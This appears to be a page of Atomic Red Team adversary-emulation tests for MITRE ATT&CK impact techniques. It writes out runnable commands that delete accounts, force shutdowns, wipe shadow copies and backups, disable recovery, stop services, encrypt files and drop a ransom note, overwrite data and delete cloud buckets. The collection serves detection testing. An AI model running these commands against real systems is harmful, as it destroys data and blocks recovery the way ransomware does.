T1531
Account Access Removal
T1529
System Shutdown/Reboot
T1496
Resource Hijacking
T1491.001
Defacement: Internal Defacement
T1490
Inhibit System Recovery
T1489
Service Stop
T1486
Data Encrypted for Impact
T1485
Data Destruction
T1531
Account Access Removal
- Atomic Test #1 - Change User Password - Windows
- Atomic Test #2 - Delete User - Windows
- Atomic Test #3 - Remove Account From Domain Admin Group
- Atomic Test #4 - Change User Password via passwd
- Atomic Test #5 - Delete User via dscl utility
- Atomic Test #6 - Delete User via sysadminctl utility
- Atomic Test #7 - Azure AD - Delete user via Azure AD PowerShell
- Atomic Test #8 - Azure AD - Delete user via Azure CLI
Change User Password - Windows
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} #{new_password}Delete User - Windows
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} /deleteRemove Account From Domain Admin Group
$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord
if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){
Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False
} else{
write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red
}Change User Password via passwd
passwd #{user_account} #enter admin password > enter new password > confirm new passwordDelete User via dscl utility
dscl . -delete /Users/#{user_account} #enter admin passwordDelete User via sysadminctl utility
sysadminctl -deleteUser #{user_account} #enter admin passwordAzure AD - Delete user via Azure AD PowerShell
Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
Remove-AzureADUser -ObjectId $userprincipalnameAzure AD - Delete user via Azure CLI
az login
$userprincipalname = "#{userprincipalname}"
az ad user delete --id $userprincipalnameT1529
System Shutdown/Reboot
- Atomic Test #1 - Shutdown System - Windows
- Atomic Test #2 - Restart System - Windows
- Atomic Test #3 - Restart System via shutdown
- Atomic Test #4 - Shutdown System via shutdown
- Atomic Test #5 - Restart System via reboot
- Atomic Test #6 - Shutdown System via halt
- Atomic Test #7 - Reboot System via halt
- Atomic Test #8 - Shutdown System via poweroff
- Atomic Test #9 - Reboot System via poweroff
- Atomic Test #10 - Logoff System - Windows
Shutdown System - Windows
shutdown /s /t #{timeout}Restart System - Windows
shutdown /r /t #{timeout}Restart System via shutdown - macOS/Linux
shutdown -r #{timeout}Shutdown System via shutdown - macOS/Linux
shutdown -h #{timeout}Restart System via reboot - macOS/Linux
rebootShutdown System via halt - Linux
halt -pReboot System via halt - Linux
halt --rebootShutdown System via poweroff - Linux
poweroffReboot System via poweroff - Linux
poweroff --rebootLogoff System - Windows
shutdown /lT1496
Resource Hijacking
macOS/Linux - Simulate CPU Load with Yes
yes > /dev/nullT1491.001
Defacement: Internal Defacement
- Atomic Test #1 - Replace Desktop Wallpaper
- Atomic Test #2 - Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
Replace Desktop Wallpaper
$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
$wc = New-Object System.Net.WebClient
try{
$wc.DownloadFile($url, $imgLocation)
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
catch [System.Net.WebException]{
Write-Host("Cannot download $url")
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
finally{
$wc.Dispose()
}Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -ForceT1490
Inhibit System Recovery
- Atomic Test #1 - Windows - Delete Volume Shadow Copies
- Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
- Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog
- Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
- Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
- Atomic Test #6 - Windows - Delete Backup Files
- Atomic Test #7 - Windows - wbadmin Delete systemstatebackup
- Atomic Test #8 - Windows - Disable the SR scheduled task
- Atomic Test #9 - Disable System Restore Through Registry
Windows - Delete Volume Shadow Copies
vssadmin.exe delete shadows /all /quietWindows - Delete Volume Shadow Copies via WMI
wmic.exe shadowcopy deleteWindows - wbadmin Delete Windows Backup Catalog
wbadmin delete catalog -quietWindows - Disable Windows Recovery Console Repair
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled noWindows - Delete Volume Shadow Copies via WMI with PowerShell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}Windows - Delete Backup Files
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dskWindows - wbadmin Delete systemstatebackup
wbadmin delete systemstatebackup -keepVersions:0Windows - Disable the SR scheduled task
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disableDisable System Restore Through Registry
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /fT1489
Service Stop
- Atomic Test #1 - Windows - Stop service using Service Controller
- Atomic Test #2 - Windows - Stop service using net.exe
- Atomic Test #3 - Windows - Stop service by killing process
Windows - Stop service using Service Controller
sc.exe stop #{service_name}Windows - Stop service using net.exe
net.exe stop #{service_name}Windows - Stop service by killing process
taskkill.exe /f /im #{process_name}T1486
Data Encrypted for Impact
- Atomic Test #1 - Encrypt files using gpg (Linux)
- Atomic Test #2 - Encrypt files using 7z (Linux)
- Atomic Test #3 - Encrypt files using ccrypt (Linux)
- Atomic Test #4 - Encrypt files using openssl (Linux)
- Atomic Test #5 - PureLocker Ransom Note
- Atomic Test #6 - Encrypt files using 7z utility - macOS
- Atomic Test #7 - Encrypt files using openssl utility - macOS
- Atomic Test #8 - Data Encrypted with GPG4Win
Encrypt files using gpg (Linux)
echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}Encrypt files using 7z (Linux)
$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}Encrypt files using ccrypt (Linux)
if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fiEncrypt files using openssl (Linux)
$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}PureLocker Ransom Note
echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txtEncrypt files using 7z utility - macOS
7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}Encrypt files using openssl utility - macOS
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}Data Encrypted with GPG4Win
cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'T1485
Data Destruction
- Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
- Atomic Test #2 - macOS/Linux - Overwrite file with DD
- Atomic Test #3 - Overwrite deleted data on C drive
- Atomic Test #4 - GCP - Delete Bucket
Windows - Overwrite file with Sysinternals SDelete
if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"macOS/Linux - Overwrite file with DD
dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytesOverwrite deleted data on C drive
cipher.exe /w:C:GCP - Delete Bucket
gcloud config set project #{project_id}
gcloud storage buckets delete gs://#{bucket_name}迷茫的人生,需要不断努力,才能看清远方模糊的志向!